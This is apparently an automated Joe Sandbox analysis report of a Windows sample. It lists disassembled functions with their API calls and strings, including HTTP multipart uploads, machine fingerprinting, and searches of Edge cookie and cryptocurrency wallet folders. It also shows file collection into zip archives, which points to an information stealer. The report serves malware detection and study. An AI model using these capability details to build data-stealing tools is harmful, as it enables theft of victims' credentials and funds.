--, xrefs: 00409C63
Content-Type: multipart/form-data; boundary=, xrefs: 00409D9B

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: HttpInternet$Request$Headers$CloseHandle$Open$Option__cftof$ConnectH_prolog3H_prolog3_InfoQuerySend__itow_s
String ID: --$Content-Length: $Content-Type: multipart/form-data; boundary=$POST$http$http://
API String ID: 2820072986-1095625359
Opcode ID: 57e7dddddc5c82f1013ef82bc48f3c9e9fd0888f86932f1fcc70fe97c14b652b
Instruction ID: 05f3c2e9147bed1234e255f1a715d87be6220a9a1bd1d57ebf6a61bf371f4e7c
Opcode Fuzzy Hash: 57e7dddddc5c82f1013ef82bc48f3c9e9fd0888f86932f1fcc70fe97c14b652b
Instruction Fuzzy Hash: 3FA1A071500209AFDB11EF64CC85EEF7BA9EB04744F40442EFA06A61D2DB789E858B68

Uniqueness

Uniqueness Score: -1.00%

Function 0045053F Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 60
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 00450581
RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,00000000), ref: 0045059D
RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,?,?,00000000), ref: 004505BC
RegCloseKey.ADVAPI32(?,?,00000000), ref: 004505C5
CharToOemA.USER32 ref: 004505D6

Strings

MachineGuid, xrefs: 004505B4
SOFTWARE\Microsoft\Cryptography, xrefs: 00450593

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: CharCloseOpenQueryValue_memset
String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
API String ID: 2235053359-1211650757
Opcode ID: f611f69b4bbbcdb8a26dfbeb4aed4f5c95b8353e18b7b4d50d145d41f05aba91
Instruction ID: d8f1856124acfbfb1100008df903c3f779658f35206ea5d183a4a3f976642563
Opcode Fuzzy Hash: f611f69b4bbbcdb8a26dfbeb4aed4f5c95b8353e18b7b4d50d145d41f05aba91
Instruction Fuzzy Hash: B81130B154024CAFEB309F64DC85AEE77ACEB08348F50442AF919D7152EF745A488F54

Uniqueness

Uniqueness Score: -1.00%

Function 00452FB3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 65
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 00452FBA
Sleep.KERNEL32(00000064,ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789,00000024,00000038,004065E6,?,00000019), ref: 00453002
__time64.LIBCMT ref: 0045300A

Part of subcall function 00459659: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,0045300F,00000000), ref: 00459664
Part of subcall function 00459659: __aulldiv.LIBCMT ref: 00459684

Part of subcall function 004513A8: _malloc.LIBCMT ref: 004513B0
Part of subcall function 004513A8: GetTickCount.KERNEL32 ref: 004513BB
Part of subcall function 004513A8: _rand.LIBCMT ref: 004513D0
Part of subcall function 004513A8: _sprintf.LIBCMT ref: 004513E3

Part of subcall function 0045C0C3: __getptd.LIBCMT ref: 0045C0C8

_rand.LIBCMT ref: 00453037

Part of subcall function 0045C0D5: __getptd.LIBCMT ref: 0045C0D5

Part of subcall function 00451670: std::_Xinvalid_argument.LIBCPMT ref: 0045167E

Strings

ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789, xrefs: 00452FD5

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: Time__getptd_rand$CountFileH_prolog3_catch_SleepSystemTickXinvalid_argument__aulldiv__time64_malloc_sprintfstd::_
String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
API String ID: 503986416-374730529
Opcode ID: ba87902022b75370a473efb06565996d35f89afbc705f93608948caab5a76553
Instruction ID: 4c67874eb57e43de21f1f44c439ec9db0490e3d973c1e5d311d4bfa5abe5574f
Opcode Fuzzy Hash: ba87902022b75370a473efb06565996d35f89afbc705f93608948caab5a76553
Instruction Fuzzy Hash: 0D21AF72940344AFDB15EFA6D886BADB7B5AF5071AF10401FF5416A2C2CBBC5A088B58

Uniqueness

Uniqueness Score: -1.00%

Function 00458681 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_malloc.LIBCMT ref: 0045869B

Part of subcall function 0045A16B: __FF_MSGBANNER.LIBCMT ref: 0045A184
Part of subcall function 0045A16B: __NMSG_WRITE.LIBCMT ref: 0045A18B
Part of subcall function 0045A16B: RtlAllocateHeap.NTDLL(00000000,00000001,?,00000001,?,?,00457E26,00000001,00000000,?,?,?,00457E84,004010F0), ref: 0045A1B0

std::exception::exception.LIBCMT ref: 004586D0
std::exception::exception.LIBCMT ref: 004586EA
__CxxThrowException@8.LIBCMT ref: 004586FB

Strings

CG, xrefs: 004586B3

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
String ID: CG
API String ID: 615853336-3621608553
Opcode ID: 8dca0c3d7f798deb0963bed72c29f5f685b078f0a56320a166bbd6776663e694
Instruction ID: fa3bdecc1873b7875c6bb3927b77a52ae99ee0500d84297de30f9e92c501c3a7
Opcode Fuzzy Hash: 8dca0c3d7f798deb0963bed72c29f5f685b078f0a56320a166bbd6776663e694
Instruction Fuzzy Hash: 83F0D631904109AEDB00FB56DC46AAF36A86B41B09F14452FEC08A2193CF798A4DCB5D

Uniqueness

Uniqueness Score: -1.00%

Function 004508D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 004508EF
_memset.LIBCMT ref: 0045091E
GetUserDefaultLocaleName.KERNEL32(?,00000055,?,?,00000008), ref: 0045092C

Strings

Unknown, xrefs: 0045093C

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: DefaultH_prolog3LocaleNameUser_memset
String ID: Unknown
API String ID: 1926270201-1654365787
Opcode ID: f99e0f802829e96949f1289efaa5a66d624d23a57d71018ec0e5d1fe1037cd3b
Instruction ID: 7c12fea8a350379891f765d0ac8e85966bfa9d599e7cdc83049c98d6d57a161e
Opcode Fuzzy Hash: f99e0f802829e96949f1289efaa5a66d624d23a57d71018ec0e5d1fe1037cd3b
Instruction Fuzzy Hash: 3231A7B1500348AFDB15EF65C891BEEB7A8EF14304F40442FF95597281DBB89A4CCB55

Uniqueness

Uniqueness Score: -1.00%

Function 004091A3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 004091B1
_strcpy_s.LIBCMT ref: 004091C7
_memset.LIBCMT ref: 004091E2

Strings

1BEF0A57BE110FD467A, xrefs: 004091B9

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: _memset$_strcpy_s
String ID: 1BEF0A57BE110FD467A
API String ID: 1261871945-2910601657
Opcode ID: e639978a788b62561f00bcd5d4db0424bcde92284caffafa435b2b4c901f2111
Instruction ID: 74956c84a231fad4928a6881d88a297953abe5ad91d14eb261615731912e31c6
Opcode Fuzzy Hash: e639978a788b62561f00bcd5d4db0424bcde92284caffafa435b2b4c901f2111
Instruction Fuzzy Hash: E0F0BBB1640704ABD760DF65C942A8A77E4EB09711F40882EB959D7641D678E8148B94

Uniqueness

Uniqueness Score: -1.00%

Function 00407C65 Relevance: 4.5, APIs: 3, Instructions: 22
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexA.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 00407C6A

Part of subcall function 00401195: _memmove.LIBCMT ref: 004011B4

GetLastError.KERNEL32(00000001,00000000,00000001,00000000,00000001,00000000), ref: 00407C91
ExitProcess.KERNEL32 ref: 00407C9F

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: CreateErrorExitLastMutexProcess_memmove
String ID:
API String ID: 539035955-0
Opcode ID: 86a14b7b0453c354a88239075d8fb36cf72ceb90145336fae36153b5cfbb0142
Instruction ID: 7dc10361578cdb7069580b2d428bb40b2610d37838c0bc49b2c37a5cdaf88dbd
Opcode Fuzzy Hash: 86a14b7b0453c354a88239075d8fb36cf72ceb90145336fae36153b5cfbb0142
Instruction Fuzzy Hash: 1DE01A30441110AED259A762DC5DEEE3B29DF55310F40003AF21AB90E19B681980CAAA

Uniqueness

Uniqueness Score: -1.00%

Function 004504E1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileA.ADVAPI32(?), ref: 00450505

Strings

Unknown, xrefs: 00450523

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: CurrentProfile
String ID: Unknown
API String ID: 2104809126-1654365787
Opcode ID: ed5c7db9a83c8bda0a426d5ec8cf03ca6eb6424b653eb8619bc6f7e73f7effc2
Instruction ID: 3d19721b55ee8708e64ecdce968c27bc7e57238ca97f33e51c90ee44237da992
Opcode Fuzzy Hash: ed5c7db9a83c8bda0a426d5ec8cf03ca6eb6424b653eb8619bc6f7e73f7effc2
Instruction Fuzzy Hash: BCF0967060020DEFDB20DF65985156EB7F8FF08349F50447FE542D3241DE74A9089B55

Uniqueness

Uniqueness Score: -1.00%

Function 004624CD Relevance: 3.0, APIs: 2, Instructions: 18
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__lock.LIBCMT ref: 004624E5

Part of subcall function 00462C3F: __mtinitlocknum.LIBCMT ref: 00462C55
Part of subcall function 00462C3F: __amsg_exit.LIBCMT ref: 00462C61
Part of subcall function 00462C3F: EnterCriticalSection.KERNEL32(00000000,00000000,?,0045ED5F,0000000D), ref: 00462C69

__tzset_nolock.LIBCMT ref: 004624F6

Part of subcall function 00461DEC: __lock.LIBCMT ref: 00461E0E
Part of subcall function 00461DEC: ____lc_codepage_func.LIBCMT ref: 00461E55
Part of subcall function 00461DEC: __getenv_helper_nolock.LIBCMT ref: 00461E77
Part of subcall function 00461DEC: _free.LIBCMT ref: 00461EAE
Part of subcall function 00461DEC: _strlen.LIBCMT ref: 00461EB5
Part of subcall function 00461DEC: __malloc_crt.LIBCMT ref: 00461EBC
Part of subcall function 00461DEC: _strlen.LIBCMT ref: 00461ED2
Part of subcall function 00461DEC: _strcpy_s.LIBCMT ref: 00461EE0
Part of subcall function 00461DEC: __invoke_watson.LIBCMT ref: 00461EF5
Part of subcall function 00461DEC: _free.LIBCMT ref: 00461F04

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: __lock_free_strlen$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__invoke_watson__malloc_crt__mtinitlocknum__tzset_nolock_strcpy_s
String ID:
API String ID: 1828324828-0
Opcode ID: aa9f905e94797dee01a2e208e125dca976ccbaed27a0d1a89d160216aa88399d
Instruction ID: c15840c79466bbc28dd6d042a734955d3b5951be67a5493d200de266e47812c2
Opcode Fuzzy Hash: aa9f905e94797dee01a2e208e125dca976ccbaed27a0d1a89d160216aa88399d
Instruction Fuzzy Hash: 01E08670440A10B6DB317BB15A4254D7120A71871AF505A3FF84122192E9F805468FAF

Uniqueness

Uniqueness Score: -1.00%

Function 0046794E Relevance: 1.6, APIs: 1, Instructions: 52
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0045CD58,00000000,?,00000000,00000000,00000000,?,0045EDF4,00000001,00000214), ref: 00467991

Part of subcall function 0045E9AD: __getptd_noexit.LIBCMT ref: 0045E9AD

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: AllocateHeap__getptd_noexit
String ID:
API String ID: 328603210-0
Opcode ID: 215812ea9c181f796a15c33589e9861e8d934f1c1a18afda669e0e4f7eb9ebd4
Instruction ID: d0ac4571d5b4b90f3899d6cf0f17daef417d54d180714f9ea8f4b749cc0ea96e
Opcode Fuzzy Hash: 215812ea9c181f796a15c33589e9861e8d934f1c1a18afda669e0e4f7eb9ebd4
Instruction Fuzzy Hash: 5A01F5F12082119BFB289F35CC04B6B37D4AF82728F10492EE8658A390E73CC848C65A

Uniqueness

Uniqueness Score: -1.00%

Function 0045B5B2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

__fsopen.LIBCMT ref: 0045B5BF

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: __fsopen
String ID:
API String ID: 3646066109-0
Opcode ID: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
Instruction ID: b20374a5bf344eff871c8eaa5519710acb4baf329fcf35ed381366b81125c7bc
Opcode Fuzzy Hash: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
Instruction Fuzzy Hash: 43C0927344020C77CF212A83EC02E5A3F1ADBC1764F048021FF1C1A262AA77EA65D6CA

Uniqueness

Uniqueness Score: -1.00%

Function 0045EC92 Relevance: 1.5, APIs: 1, Instructions: 3COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000,0046C3FD,0048C7A8,00000314,00000000,?,?,?,?,?,00463C4D,0048C7A8,Microsoft Visual C++ Runtime Library,00012010), ref: 0045EC94

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: fce54e89acc4182465ef5816f40e907540e67eb759d4997c285dc127cab4dce6
Instruction ID: 567723ca26f754c3e34dac0ffac311735c22ee680aebda45be1a6af96c24143c
Opcode Fuzzy Hash: fce54e89acc4182465ef5816f40e907540e67eb759d4997c285dc127cab4dce6
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00404BD7 Relevance: 70.5, APIs: 18, Strings: 22, Instructions: 486stringfileCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00404BF6
lstrcpyW.KERNEL32 ref: 00404C23
lstrcatW.KERNEL32(?,\*.*), ref: 00404C3B
FindFirstFileW.KERNEL32(?,00000000), ref: 00404C48
lstrcpyW.KERNEL32 ref: 00404C5B
lstrcatW.KERNEL32(?,00475B00), ref: 00404C6E
lstrcatW.KERNEL32(?,?), ref: 00404C7B
lstrcpyW.KERNEL32 ref: 00404C87
lstrcatW.KERNEL32(?,00475B00), ref: 00404C95
lstrcatW.KERNEL32(?,?), ref: 00404CA2
lstrcmpW.KERNEL32(?,00475AFC), ref: 00404CB9
lstrcmpW.KERNEL32(?,00475AF4), ref: 00404CCC

Part of subcall function 00404BD7: DeleteFileW.KERNEL32(?,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,?,00000001,00000000), ref: 00404E9C

PathMatchSpecW.SHLWAPI(?,00000000,?,00000001,00000001,00000000,?,?,?), ref: 00404D97
PathMatchSpecW.SHLWAPI(?,00000000,?,00000001,netfulfilled,00000000,mnpayments,00000000,mncache,00000000,governance,00000000,banlist,00000000,mempool,00000000), ref: 004050FF
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00405134

Part of subcall function 00453074: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,0000000F,?,00000000,?,?,?,0045097C,?), ref: 004530A5
Part of subcall function 00453074: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000008), ref: 004530C8

FindNextFileW.KERNEL32(?,00000000,00000001,00000000,netfulfilled,00000000,mnpayments,00000000,mncache,00000000,governance,00000000,banlist,00000000,mempool,00000000), ref: 00405249
FindClose.KERNEL32(?), ref: 0040525A

Strings

MicrosoftEdge\Cookies, xrefs: 00404FE4
banlist, xrefs: 0040505C
fee_estimates, xrefs: 00405014
ProgramData, xrefs: 00404EC7
\*.*, xrefs: 00404C2F
Program Files, xrefs: 00404F6F
Users\Public, xrefs: 00404FFC
All Users, xrefs: 00404FCC
governance, xrefs: 00405074
Local\Temp, xrefs: 00404F57
netfulfilled, xrefs: 004050BC
Recycle.Bin, xrefs: 00404FB4
Config.Msi, xrefs: 00404EF7
mncache, xrefs: 0040508C
System Volume Information, xrefs: 00404F0F
Windows, xrefs: 00404EA8
Recovery, xrefs: 00404F3F
mnpayments, xrefs: 004050A4
RECYCLE.BIN, xrefs: 00404EDF
mempool, xrefs: 00405044
peers, xrefs: 0040502C
msdownld.tmp, xrefs: 00404F27

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: lstrcat$FileFindlstrcpy$ByteCharMatchMultiPathSpecWidelstrcmp$CloseDeleteFirstH_prolog3NextUnothrow_t@std@@@__ehfuncinfo$??2@
String ID: All Users$Config.Msi$Local\Temp$MicrosoftEdge\Cookies$Program Files$ProgramData$RECYCLE.BIN$Recovery$Recycle.Bin$System Volume Information$Users\Public$Windows$\*.*$banlist$fee_estimates$governance$mempool$mncache$mnpayments$msdownld.tmp$netfulfilled$peers
API String ID: 2006358813-3816989509
Opcode ID: 05b2790af58336c828903b73651ff46f41033689cfc496cdae2cb095b89b6a98
Instruction ID: 95c2f12ab1957a4b27c624f171056fb5ab6fde850e6d3c6d52df51198c52351c
Opcode Fuzzy Hash: 05b2790af58336c828903b73651ff46f41033689cfc496cdae2cb095b89b6a98
Instruction Fuzzy Hash: CA124CB1501289AEDB31EF90DC85AEE776CFF44305F14062FE909AA1D1DB78AB44CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00405742 Relevance: 34.4, APIs: 8, Strings: 11, Instructions: 1111COMMON

Download Yara Rule

APIs

_strtok.LIBCMT ref: 004057A6
_strtok.LIBCMT ref: 00405868

Part of subcall function 00404B44: __EH_prolog3.LIBCMT ref: 00404B4B

Part of subcall function 00404147: _memmove.LIBCMT ref: 00404169

Part of subcall function 00401195: _memmove.LIBCMT ref: 004011B4

__wgetenv.LIBCMT ref: 004059BB
__wgetenv.LIBCMT ref: 00405A4E
GetLogicalDriveStringsA.KERNEL32 ref: 00405DC6
_strtok.LIBCMT ref: 00405DF8
GetDriveTypeA.KERNEL32(?,00000001,00000000,?,?,?,?,?), ref: 00405E5D

Part of subcall function 0045341F: MultiByteToWideChar.KERNEL32(00000000,00000000,00000104,?,00000000,00000000,000003E8,?,00000000,?,?,?,004096C0,00000104,00000104,?), ref: 0045344E
Part of subcall function 0045341F: MultiByteToWideChar.KERNEL32(00000000,00000000,00000104,?,00000000,?,?,00000000,?,?,?,004096C0,00000104,00000104,?,?), ref: 0045347D

Part of subcall function 00401FF9: _memmove.LIBCMT ref: 0040201B

_strtok.LIBCMT ref: 00406504

Part of subcall function 004596EF: __getptd.LIBCMT ref: 0045970D

Strings

.zip, xrefs: 00405E00
%DRIVE_FIXED%, xrefs: 0040611D, 00406122, 00406155
false, xrefs: 00405EEB, 0040603A, 004061A2, 0040630A, 0040641B
C:\Users\, xrefs: 004058FE, 00405AEF, 00405D11
%DRIVE_REMOVABLE%, xrefs: 00406285, 0040628A, 004062BD
%C%, xrefs: 00405B94, 00405BBE
%ALL_DRIVES%, xrefs: 00405E64, 00405E69, 00405E9E, 00405FCD, 00405FED
%DOCUMENTS%, xrefs: 00405CCA, 00405CF1
\Desktop, xrefs: 00405B01
%D%, xrefs: 00405C35, 00405C58
\Documents, xrefs: 00405D23

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: _strtok$_memmove$ByteCharDriveMultiWide__wgetenv$H_prolog3LogicalStringsType__getptd
String ID: %ALL_DRIVES%$%C%$%D%$%DOCUMENTS%$%DRIVE_FIXED%$%DRIVE_REMOVABLE%$.zip$C:\Users\$\Desktop$\Documents$false
API String ID: 4057770416-1863809354
Opcode ID: e771a7b1cd1840019e990056f334ab3250852f2b0d18c6df58822d73d49b4641
Instruction ID: 00c055a3240114ed0162c948be46a8512e5d0c104ddbf97ccbd43e503199406b
Opcode Fuzzy Hash: e771a7b1cd1840019e990056f334ab3250852f2b0d18c6df58822d73d49b4641
Instruction Fuzzy Hash: 5792A771900248EEDB15EFA8C946BEE7BB8AF15304F14406EF905BB1D2DB785B08C766

Uniqueness

Uniqueness Score: -1.00%

Function 00405291 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 240stringfileCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004052B0
lstrcpyW.KERNEL32 ref: 004052D4
lstrcatW.KERNEL32(?,\*.*), ref: 004052EC
FindFirstFileW.KERNEL32(?,00000000), ref: 004052F9
lstrcpyW.KERNEL32 ref: 0040530C
lstrcatW.KERNEL32(?,00475B00), ref: 0040531F
lstrcatW.KERNEL32(?,?), ref: 0040532C
lstrcpyW.KERNEL32 ref: 00405338
lstrcatW.KERNEL32(?,00475B00), ref: 00405346
lstrcatW.KERNEL32(?,?), ref: 00405353
lstrcmpW.KERNEL32(?,00475AFC), ref: 0040536A
lstrcmpW.KERNEL32(?,00475AF4), ref: 0040537D

Part of subcall function 00405291: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00405563
Part of subcall function 00405291: CreateDirectoryW.KERNEL32(?,00000000,00000000,?,000003E8,00000000,00000001,00000000,?,00000001,00000000,?,?,?,00000001,00000000), ref: 00405573
Part of subcall function 00405291: CopyFileW.KERNEL32(?,?,00000001,?,000003E8,00000000,00000001,00000000,?,00000001,00000000,?,?,?,00000001,00000000), ref: 00405589

PathMatchSpecW.SHLWAPI(?,00000000,?,00000000,00000001,00000000,?,?,?), ref: 0040542B
FindNextFileW.KERNEL32(00000008,00000000,00000001,00000000,00000001,00000000), ref: 004055AD
FindClose.KERNEL32(00000008), ref: 004055BE

Strings

\*.*, xrefs: 004052E0

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: lstrcat$FileFindlstrcpy$lstrcmp$CloseCopyCreateDirectoryFirstH_prolog3MatchNextPathSpecUnothrow_t@std@@@__ehfuncinfo$??2@
String ID: \*.*
API String ID: 3235842901-1173974218
Opcode ID: 1ef499db8ab23a4079b0f9bee30adf763c52b698abf0d202c684576f9ad39fce
Instruction ID: 2f8f86f26a532806d7a1aabba321516a6de99c485e3bd124019b4e74bba741b8
Opcode Fuzzy Hash: 1ef499db8ab23a4079b0f9bee30adf763c52b698abf0d202c684576f9ad39fce
